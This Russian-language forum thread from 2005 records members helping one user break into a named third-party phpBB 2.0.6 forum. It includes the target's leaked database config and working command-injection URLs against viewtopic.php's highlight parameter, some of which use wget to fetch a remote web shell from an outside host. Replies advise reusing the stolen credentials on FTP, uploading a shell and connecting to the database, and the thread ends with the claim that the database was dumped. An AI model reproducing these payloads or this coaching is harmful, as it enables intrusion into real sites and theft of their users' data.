Форумы Где находиться база данных в phpbb 2.0.6?

Discussion in 'Уязвимости CMS/форумов' started by temon, 13 Dec 2005.

  1. temon

    temon Elder - Старейшина

    Joined:
    6 Feb 2005
    Messages:
    114
    Likes Received:
    4
    Reputations:
    0
    Привет всем. Тут нашёл форум один, на нём вотчи 2500 человек тусуются.
    Но он phpbb 2.0.6
    Вытащил информацию(пароль и логин от бд) но в строке адрес бд написано localhost.
    Как мне найти где база данных находиться?

    Потом ещё хспидером просканил и вот что обнаружилось. Критическая ошибка, ведущая к краху системы.
    Как ею воспользоваться мне??

    PHP does not perform proper bounds checking on in functions related
    to Form-based File Uploads in HTML (RFC1867). Specifically, this
    problem occurs in the functions which are used to decode MIME
    encoded files. As a result, it may be possible to overrun
    the buffer used for the vulnerable functions to cause arbitrary
    attacker-supplied instructions to be executed.

    Solution:
    1. As a workaround, file uploads may be disabled in PHP versions 4.0.3 and later.
    2. Upgrade to latest version.

    Patch: http://www.php.net/downloads.php

    URLs:
    http://www.securityfocus.com/bid/4183



    Заранее спаисбо.
     
  2. vorishka

    vorishka Elder - Старейшина

    Joined:
    3 Mar 2005
    Messages:
    309
    Likes Received:
    43
    Reputations:
    22
    Никак. Локалхост у хостера ;) Причём накой он тебе? У тебя БД
     
  3. temon

    temon Elder - Старейшина

    Joined:
    6 Feb 2005
    Messages:
    114
    Likes Received:
    4
    Reputations:
    0
    так а как я в дб залезу не знаю её адреса?? у меня вот как:
    uid=1010(httpd)
    gid=1005(httpd)
    groups=1005(httpd)
    Linux alvisp 2.4.22 #2 Mon Sep 8 16:52:45 YEKST 2003 i686 unknown
    $dbms = 'mysql';
    $dbhost = 'localhost';
    $dbname = 'forum';
    $dbuser = 'vscrk';
    $dbpasswd = ''; )\b#i
     
  4. Deem3n®

    Deem3n® RTFMSDN

    Joined:
    19 Sep 2005
    Messages:
    378
    Likes Received:
    153
    Reputations:
    164
    localhost - это значит что база на том же хосте что и форум

    Узнай хост простым пингом.
    Пример:
    ping forum.antichat.ru
    Pinging forum.antichat.ru [81.177.6.78] with 32 bytes of data

    81.177.6.78 - вот хост форума
     
  5. temon

    temon Elder - Старейшина

    Joined:
    6 Feb 2005
    Messages:
    114
    Likes Received:
    4
    Reputations:
    0
    каким образом это мжно сделать?
     
  6. FQziT

    FQziT Elder - Старейшина

    Joined:
    3 Nov 2005
    Messages:
    543
    Likes Received:
    156
    Reputations:
    206
    temon Что именно седелать? Ты про пинг?
    Пуск => Выполнить => cmd => А тут по примеру смотри=))

    ЗЫ Попробуй логин и пароль от БД к ФТП=) Иногда подходит-))
     
    #6 FQziT, 13 Dec 2005
    Last edited: 13 Dec 2005
  7. temon

    temon Elder - Старейшина

    Joined:
    6 Feb 2005
    Messages:
    114
    Likes Received:
    4
    Reputations:
    0
    пинг я уже сделал. А вот адреса фтп тоже не знаю.
     
  8. temon

    temon Elder - Старейшина

    Joined:
    6 Feb 2005
    Messages:
    114
    Likes Received:
    4
    Reputations:
    0
    ну сделал я пинг, адрес хоста узнал, хотя его и так знал. потом что?
    где бд искать?
     
  9. D1mOn

    D1mOn Elder - Старейшина

    Joined:
    2 Oct 2005
    Messages:
    380
    Likes Received:
    144
    Reputations:
    29
    Адрес фтп тот же что и адрес форума, а к бд через phpMyAmdin конектись.
     
  10. africanec

    africanec Banned

    Joined:
    11 Sep 2005
    Messages:
    222
    Likes Received:
    14
    Reputations:
    -3
    $dbpasswd = ''; )\b#i -неправильный пароль
    правильно используй узвимость
     
  11. qBiN

    qBiN Вот такой вот я :(

    Joined:
    20 Jan 2005
    Messages:
    834
    Likes Received:
    73
    Reputations:
    33
    какой нах неправильный пароль??
    Для юзера vscrk его вопще нет.
     
  12. temon

    temon Elder - Старейшина

    Joined:
    6 Feb 2005
    Messages:
    114
    Likes Received:
    4
    Reputations:
    0
    вот именно. Как не старался пароль вытягивать, видимо база данных без пароля стоит.
    Я ТАК думаю что сервак сайта ваще на апаче стоит.



    А как подключаться через phpMy Admin ???

    Пытаюсь на фтп залазить тоже не получается.
    Может можно щелл залить??
    v
    iewtopic.php?p=1&highlight=%2527.$poster=%60$ls%60.%2527&ls=wget%20http://xyra.narod.ru/remview.php
    viewtopic.php?p=3906&highlight=%2527.$poster=`wget%09http://xyra.narod.ru/remview.php`.%2527
    Вот этими пытаюсь нифига не получается.

    Короче вот ссылка на форум.
    Только пожалуйста не пакостите там, я хочу сам.
    Прошу вас.
    Вы только помогите мне бд найти.
    http://panda.alvisp.ru/pages/forum/viewtopic.php?p=213&highlight=%2527.$poster=%60$ls%60.%2527&ls=id;uname%20-a;cat%20config.php|grep%20db
     
    #12 temon, 14 Dec 2005
    Last edited: 14 Dec 2005
  13. qBiN

    qBiN Вот такой вот я :(

    Joined:
    20 Jan 2005
    Messages:
    834
    Likes Received:
    73
    Reputations:
    33
    Это не кавычка,а 2 апострофа=>пароль для юзера пустой.
    Подключись к базе,щас много всяких mysql клиентов.
    зы настчет phpmyadmin есть уже тема
     
  14. Xalegi

    Xalegi Elder - Старейшина

    Joined:
    24 Nov 2004
    Messages:
    109
    Likes Received:
    4
    Reputations:
    6
    почитал я туть =)
    вот в чём проблема...
    правильно начал вроде.
    используй &highlight=%2527.$poster=%60$cmd%60.%2527&cmd=ТУТ_КОМАНДА
    в том что у тя не получается залить шелл проверь права папки куда ты пытаешься залить... (следовательно если прав не хватает ставь выставь нужные... chmod 755 papka) (поправте если ошибаюсь) заливаешь шелл...

    дык... вообще есть ls -la, cd, шо ещё для счастья нужна? =)
    дерзай...

    по поводу БД... ммм... как уже заметили есть кууучу клиентов для конекта в БД...
     
  15. temon

    temon Elder - Старейшина

    Joined:
    6 Feb 2005
    Messages:
    114
    Likes Received:
    4
    Reputations:
    0
    бд уже слили кажется :))